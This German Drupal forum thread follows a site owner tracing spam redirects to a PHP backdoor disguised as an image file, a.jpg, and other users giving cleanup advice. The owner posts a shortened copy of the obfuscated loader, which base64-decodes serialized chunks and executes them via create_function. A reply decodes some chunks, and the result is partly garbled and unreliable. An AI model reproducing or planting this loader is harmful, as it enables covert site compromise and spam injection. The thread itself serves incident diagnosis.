Weiterleitung durch Schadcode

Eingetragen von dieSeite (6)
am 04.04.2019 - 17:10 Uhr in

Liebe Forum-Mitglieder!

Ich habe ein Problem mit einer Drupal-Instanz!
Zwar verwende ich Drupal 7.65 und folgende Module:

Colorbox
Libraries
Entity
Scheduler
Views
CKEditor
Wysiwyg
IMCE
CTools
Date
Localization Update
Meta Tags
Captcha
Administration Menu
Webform
XML Sitemap

Es dürfte sich irgendwo Schadcode eingenistet haben, denn wenn ich eine bestimmte Kombination an die Domain anhänge,

zB.: meineDomain.at/abcde

werde ich auf eine ganz andere Domain weitergeleitet!
Ich habe bereits alles durchsucht, die htaccess, die URL-Aliase, die Datenbank usw. - aber ich kann "abcde" nirgendwo finden!

Wie könnte dieser Schadcode sonst noch hinterlegt sein?
Ich weiß bereits, dass die Zeichenfolge "abcde" eine bestimmte IP-Adresse aufruft, aber auch diese IP-Adresse finde ich nicht in meinem Verzeichnis.

Vielleicht hatte ja jemand schon einmal ein ähnliches Problem.

Herzlichen Dank schonmal im Voraus
Roman

Anmelden oder Registrieren um Kommentare zu schreiben

In der Index.php

Eingetragen von dinmikkith (1399)
am 04.04.2019 - 18:41 Uhr

In der Index.php

https://drupal-tv.de
Drupal sehen und lernen

Anmelden oder Registrieren um Kommentare zu schreiben

Oder im Theme in der

Eingetragen von wla (9428)
am 04.04.2019 - 20:06 Uhr

Oder im Theme in der page.tpl.php

.
Werner
drupal-training.de
Moderator und Drupal Trainer
* - - - - - - - - - - - - - - - - - - - - - - - - - - - *

Anmelden oder Registrieren um Kommentare zu schreiben

Leider weder in der index.php

Eingetragen von dieSeite (6)
am 04.04.2019 - 20:49 Uhr

Leider weder in der index.php noch in der page.tpl.php oder html.tpl.php.

Wie gesagt, ich habe mit Notepad++ bereits das komplette Drupal Verzeichnis nach diversen Zeichenkombinationen und IP-Adressen bzw. Teile davon durchsucht - alles leider ohne Erfolg.

Wenn ich bei Google site:meineDomain.at eingebe, bekomme ich über 9700 Ergebnisse, welche mit allen möglichen Zeichenkombinationen enden?

meineDomain.at/sewyjat
meineDomain.at/gifezi
meineDomain.at/lymalujok usw.
und alle diese Seiten verweisen auf irgendwelche dubiosen Seiten?

Bin wirklich ratlos........bin für jeden Tipp sehr dankbar

Anmelden oder Registrieren um Kommentare zu schreiben

dies können natürlich auch Nodes sein

Eingetragen von ronald (3852)
am 05.04.2019 - 07:49 Uhr

oder Alias-Einträge

Grüße
Ronald

Anmelden oder Registrieren um Kommentare zu schreiben

oder htaccess?

Eingetragen von bv (3924)
am 05.04.2019 - 09:10 Uhr

oder htaccess?

Anmelden oder Registrieren um Kommentare zu schreiben

Ansonsten kannst du mal

Eingetragen von bv (3924)
am 05.04.2019 - 09:12 Uhr

Ansonsten kannst du mal hacked und diff installieren, damit werden dir manipulierte Dateien angezeigt:

https://www.drupal.org/project/hacked

https://www.drupal.org/project/diff

Anmelden oder Registrieren um Kommentare zu schreiben

hab's gefunden

Eingetragen von dieSeite (6)
am 13.04.2019 - 06:31 Uhr

Danke erstmal für die Tipps!

Ich hatte bei der Drupal-Instanz alle Module, alle Bibliotheken und natürlich auch Drupal selber neu installiert - hatte alles nichts gebracht.

Bis mir dann im Ordner sites/default/files eine Datei Namens a.jpg aufgefallen ist???
In dieser vermeintlichen jpg-Datei war doch tatsächlich der Schadcode geschrieben.

<?php

error_reporting(0);
require_once('includes/session.inc');
$serialized = 'a:38:{i:0;s:156:"aWYoIWNsYXNzX2V4aXN0cygnUmF0ZWwnKSkgeyBpZiAoZnVuY3Rpb25fZXhpc3RzKCdpc191c2VyX2xvZ2dlZF9pbicpKSB7IGlmIChpc191c2VyX2xvZ2dlZF9pbigpKXsgcmV0dXJuIGZhbHNlO319IA0=";i:1;s:184:"aWYoaXNzZXQoJF9SRVFVRVNUWyd4ZnRlc3QnXSkpIHtkaWUocGkoKSo2KTt9QGluaV9zZXQoJ2Rpc3BsYXlfZXJyb3JzJywgMCk7QGluaV9zZXQoJ2Vycm9yX3JlcG9ydGluZycsIDApO0Bpbmlfc2V0KCdsb2dfZXJyb3JzJywgTlVMTCk7DQ==";i:2;s:372:"QGluaV9zZXQoJ2RlZmF1bHRfc29ja2V0X3RpbWVvdXQnLCA0KTtpZiAoIWlzc2V0KCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSkgfHwgIXRyaW0oJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddKSkge3JldHVybiBmYWxzZTt9JGlzX2JvdCA9IDA7aWYgKEBwcmVnX21hdGNoKCIvKGdvb2dsZWJvdHxtc25ib3R8eWFob298c2VhcmNofGJpbmd8YXNrfGluZGV4ZXJ8Y3VpbGwuY29tfGNsdXNoYm90KS9pIiwgJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKSkgeyRpc19ib3QgPSAxO30N";i:3;s:344:"JGJhZF9maWxlID0gYXJyYXkoInBuZyIsICJqcGciLCAianBlZyIsICJnaWYiLCAiY3NzIiwgImpzIiwgInN3ZiIsICJhdmkiLCAibXA0IiwgIm1wMyIsICJmbHYiLCAicGRmIiwgInppcCIsICJ0eHQiKTskcnVyaSA9IHRyaW0oJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl0sICJcdFxuXHJcMFx4MEIvIik7aWYgKHByZWdfbWF0Y2goIi8od3AtaW5jbHVkZXN8YWRtaW58bG9naW58YWRtaW5pc3RyYXRvcikvaSIsICRydXJpKSkge3JldHVybiBmYWxzZTt9DQ==";i:4;s:444:"fSBlbHNlIHtpZiAoc3Vic3RyKCR0YWdfdmFsWydjb250ZW50J10sIC0oc3RybGVuKCR0YWdfdmFsWyd0YWcnXSkgKyA0KSkgPT0gIi48L3skdGFnX3ZhbFsndGFnJ119PiIpIHskdGFnX2NvbnRlbnRfbmV3ID0gc3RyX3JlcGxhY2UoIi48L3skdGFnX3ZhbFsndGFnJ119PiIsICIgeyRsaW5rfS48L3skdGFnX3ZhbFsndGFnJ119PiIsICR0YWdfdmFsWydjb250ZW50J10pO30gZWxzZSB7JHRhZ19jb250ZW50X25ldyA9IHN0cl9yZXBsYWNlKCI8L3skdGFnX3ZhbFsndGFnJ119PiIsICIgeyRsaW5rfSA8L3skdGFnX3ZhbFsndGFnJ119PiIsICR0YWdfdmFsWydjb250ZW50J10pO319DQ==";i:24;s:196:"ZmNsb3NlKCRmcCk7fX1yZXR1cm4gVFJVRTt9fSRyYXRlbCA9IG5ldyBSYXRlbDskcmF0ZWwtPmluaXQoJHJ1cmksICRob3N0LCAkaXNfYm90KTt9aWYgKCFlbXB0eSgkX1JFUVVFU1RbJ3NldF9sYW5nJ10pKSBlY2hvICc8IS0tIGxhbmdfVVNfNiAtLT4nOw==";}';
$rawData = array_map("base64_decode", unserialize($serialized));
$rawData = implode($rawData);
$outputData = create_function(false, $rawData);
call_user_func($outputData);

Den Schadcode habe ich gekürzt, ist in Wirklichkeit um einiges länger......
Außer require_once('includes/session.inc'); habe ich alles gelöscht.

Leider kann ich diese Datei nicht mehr komplett entfernen, da die Datenbank darauf referenziert und alles codiert ist, deshalb konnte ich auch nichts finden.
Man kann aber den kompletten Schadcode entfernen und nur diese eine benötigte Zeile stehen lassen.

Damit funktioniert die Webseite ohne Probleme und auch die Weiterleitungen auf die dubiosen Seiten landen jetzt endlich auf einer 404-Seite (leider nicht gefunden)

Vielleicht hilft es ja auch anderen beim Problem mit Defacement!

Schönes Wochenende

Anmelden oder Registrieren um Kommentare zu schreiben

Wie kann eine php-Datei, die

Eingetragen von Ionit (1802)
am 13.04.2019 - 11:41 Uhr

Wie kann eine php-Datei, die als jpg getarnt ist, auf dem Server als php ausgeführt werden?

Wie ist so etwas möglich?

Edit:
Habe gerade gelesen, dass dazu Änderungen in .htaccess notwendig sind. Hast Du die .htaccess darauf überprüft, dass Bilder als PHP ausgeführt werden können? Da muss entsprechender Code drinstehen (da andersfalls die Ausführung gar nicht möglich gewesen wäre).

https://security.stackexchange.com/questions/111935/exploiting-a-php-ser...

Drupal rockt!!!

Anmelden oder Registrieren um Kommentare zu schreiben

Der Code wurde ja nicht in

Eingetragen von dieSeite (6)
am 13.04.2019 - 12:00 Uhr

Der Code wurde ja nicht in eine richtige Bilddatei geschrieben, also nicht in die EXIF-Daten oder ähnliches.
Es wurde wahrscheinlich in eine normale php-Datei geschrieben und danach einfah die Endung umbenannt.

VIelleicht mittels Script vor dem Ausführen nochmals die Endung umgeschrieben damit sie eben ausgeführt werden kann.

Aber da sollte besser ein Experte dazu antworten, genau weiß ich das leider nicht.

Anmelden oder Registrieren um Kommentare zu schreiben

Ich würde auf jeden Fall auf

Eingetragen von montviso (2188)
am 13.04.2019 - 16:21 Uhr

Ich würde auf jeden Fall auf ein Backup zurück setzen, das sauber ist.
Du weißt ja nicht, was in der Datenbank noch an Schadcode steht (Backdoor).
Wurde in der Vergangenheit immer regelmäßig Update gefahren?
Sonst könnte diese Backdoor ja auch schon älter sein und jetzt erst zur Wirkung kommen.
Dass jetzt wieder alles funktioniert ist auf jeden Fall nicht so wirklich beruhigend.
Die Module hacked und diff sind auf jeden Fall sinnvoll, aber sie geben Dir auch nur Aufschluss, ob vielleicht noch wo eine geänderte Datei steckt.

LG Regina Oswald
-------------------------
Montviso - Internetdienstleistungen
http://www.montviso.de

Anmelden oder Registrieren um Kommentare zu schreiben

Hi. So sehen die beiden

Eingetragen von Hyp1 (1463)
am 14.04.2019 - 09:22 Uhr

Hi.
So sehen die beiden Base64 Strings in deinem Schadcode decoded aus.
Evtl. hilft Dir das.

Base64 String 1:

aWYoIWNsYXNzX2V4aXN0cygnUmF0ZWwnKSkgeyBpZiAoZnVuY3Rpb25fZXhpc3RzKCdpc191c2VyX2xvZ2dlZF9pbicpKSB7IGlmIChpc191c2VyX2xvZ2dlZF9pbigpKXsgcmV0dXJuIGZhbHNlO319IA0=";i:1;s:184:"aWYoaXNzZXQoJF9SRVFVRVNUWyd4ZnRlc3QnXSkpIHtkaWUocGkoKSo2KTt9QGluaV9zZXQoJ2Rpc3BsYXlfZXJyb3JzJywgMCk7QGluaV9zZXQoJ2Vycm9yX3JlcG9ydGluZycsIDApO0Bpbmlfc2V0KCdsb2dfZXJyb3JzJywgTlVMTCk7DQ==";i:2;s:372:"QGluaV9zZXQoJ2RlZmF1bHRfc29ja2V0X3RpbWVvdXQnLCA0KTtpZiAoIWlzc2V0KCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSkgfHwgIXRyaW0oJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddKSkge3JldHVybiBmYWxzZTt9JGlzX2JvdCA9IDA7aWYgKEBwcmVnX21hdGNoKCIvKGdvb2dsZWJvdHxtc25ib3R8eWFob298c2VhcmNofGJpbmd8YXNrfGluZGV4ZXJ8Y3VpbGwuY29tfGNsdXNoYm90KS9pIiwgJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKSkgeyRpc19ib3QgPSAxO30N";i:3;s:344:"JGJhZF9maWxlID0gYXJyYXkoInBuZyIsICJqcGciLCAianBlZyIsICJnaWYiLCAiY3NzIiwgImpzIiwgInN3ZiIsICJhdmkiLCAibXA0IiwgIm1wMyIsICJmbHYiLCAicGRmIiwgInppcCIsICJ0eHQiKTskcnVyaSA9IHRyaW0oJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl0sICJcdFxuXHJcMFx4MEIvIik7aWYgKHByZWdfbWF0Y2goIi8od3AtaW5jbHVkZXN8YWRtaW58bG9naW58YWRtaW5pc3RyYXRvcikvaSIsICRydXJpKSkge3JldHVybiBmYWxzZTt9DQ==

Decoded:

if(!class_exists('Ratel')) { if (function_exists('is_user_logged_in')) { if (is_user_logged_in()){ return false;}} 
뛵㆖b旷6WBⅵ$UTU5EⷆgFW7BuҒ⇶F撇ₒ㢓甆榕綗Bⶆ緆Ɨ嶗'&秲r㴆榕綗B⶗'&祷&W秆榲r㴆榕綗Bⶆ浶W'&秲r唄Є泾怩ni_set('default_socket_timeout', 4);if (!isset($_SERVER['HTTP_USER_AGENT']) || !trim($_SERVER['HTTP_USER_AGENT'])) {return false;}$is_bot = 0;if (@preg_match("/(googlebot|msnbot|yahoo|search|bing|ask|indexer|cuill.com|clushbot)/i", $_SERVER["HTTP_USER_AGENT"])) {$is_bot = 1;}
뻷ゆ&E榖ƒ҆'&₧沢&熲"&熖r"&v梢&772"&粢'7vb"&f⢂&׃B"&׃2"&fǢ"'Fb"'旂"'G炢㲇'W&⃒G&撂E崕%dU%⥤UTU5E啤⥒%ǅƥǥÅǃ"⢓斢燦Vu斗F6₢⇷֖涇VFW7ƖF֖熆涖熖F֖旷G&F碒撢G'W&⒒禗GW&↦ǶS琐䀀

Base64 String 2:

JGJhZF9maWxlID0gYXJyYXkoInBuZyIsICJqcGciLCAianBlZyIsICJnaWYiLCAiY3NzIiwgImpzIiwgInN3ZiIsICJhdmkiLCAibXA0IiwgIm1wMyIsICJmbHYiLCAicGRmIiwgInppcCIsICJ0eHQiKTskcnVyaSA9IHRyaW0oJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl0sICJcdFxuXHJcMFx4MEIvIik7aWYgKHByZWdfbWF0Y2goIi8od3AtaW5jbHVkZXN8YWRtaW58bG9naW58YWRtaW5pc3RyYXRvcikvaSIsICRydXJpKSkge3JldHVybiBmYWxzZTt9DQ==";i:4;s:444:"fSBlbHNlIHtpZiAoc3Vic3RyKCR0YWdfdmFsWydjb250ZW50J10sIC0oc3RybGVuKCR0YWdfdmFsWyd0YWcnXSkgKyA0KSkgPT0gIi48L3skdGFnX3ZhbFsndGFnJ119PiIpIHskdGFnX2NvbnRlbnRfbmV3ID0gc3RyX3JlcGxhY2UoIi48L3skdGFnX3ZhbFsndGFnJ119PiIsICIgeyRsaW5rfS48L3skdGFnX3ZhbFsndGFnJ119PiIsICR0YWdfdmFsWydjb250ZW50J10pO30gZWxzZSB7JHRhZ19jb250ZW50X25ldyA9IHN0cl9yZXBsYWNlKCI8L3skdGFnX3ZhbFsndGFnJ119PiIsICIgeyRsaW5rfSA8L3skdGFnX3ZhbFsndGFnJ119PiIsICR0YWdfdmFsWydjb250ZW50J10pO319DQ==";i:24;s:196:"ZmNsb3NlKCRmcCk7fX1yZXR1cm4gVFJVRTt9fSRyYXRlbCA9IG5ldyBSYXRlbDskcmF0ZWwtPmluaXQoJHJ1cmksICRob3N0LCAkaXNfYm90KTt9aWYgKCFlbXB0eSgkX1JFUVVFU1RbJ3NldF9sYW5nJ10pKSBlY2hvICc8IS0tIGxhbmdfVVNfNiAtLT4nOw==

Decoded:

$bad_file = array("png", "jpg", "jpeg", "gif", "css", "js", "swf", "avi", "mp4", "mp3", "flv", "pdf", "zip", "txt");$ruri = trim($_SERVER["REQUEST_URI"], "\t\n\r\0\x0B/");if (preg_match("/(wp-includes|admin|login|administrator)/i", $ruri)) {return false;}
닸㇒VǶR斢緖'7G"⇆u禖Ųv6槆V炵҂҇7G&Ɩ₇Fu禖ŲwFruҒ⃂⒃Ӓ"シ⇆u禖ŲwFruד⢒⇆u涶熖煶旲҇7G%禗Ɩ6R⢣·⇆u禖ŲwFruד⢂"ↆ榷ң·⇆u禖ŲwFruד⢂GFu禖Ųv6槆V炵ғ璆VǶR⇆u涶熖煶旲҇7G%禗Ɩ6R⣂粇Fu禖ŲwFruד⢂"ↆ榷҃·⇆u禖ŲwFruד⢂GFu禖Ųv6槆V炵ғ痐Є梍}降Ὅ䠑逤�ɕѕɸᑉU�ቅѕ4ṕ܁I呕଑Ʌѕഹ幥РቕɤὍаѥͽ齐䭵嘀ŕ偑䠑}IEUMQl퍕ѽᅹ이䤁卡쀜Ĵ䁱幝}UM|؀䴸쬀

https://awri.ch
Ich habe eine Schweizer Tastatur und daher kein scharfes ß ;-)

Anmelden oder Registrieren um Kommentare zu schreiben

wla	9428
stBorchert	6003
quiptime	4972
Tobias Bähr	4019
bv	3924
ronald	3852
md	3717
Thoor	3678
Alexander Langer	3416
Exterior	2903

Weiterleitung durch Schadcode

In der Index.php

Oder im Theme in der

Leider weder in der index.php

dies können natürlich auch Nodes sein

oder htaccess?

Ansonsten kannst du mal

hab's gefunden

Wie kann eine php-Datei, die

Der Code wurde ja nicht in

Ich würde auf jeden Fall auf

Hi. So sehen die beiden

Benutzeranmeldung

Aktive Forenthemen

Neue Kommentare

Statistik

Hauptmenü

Quicklinks I

Quicklinks II

Quicklinks III

RSS & Twitter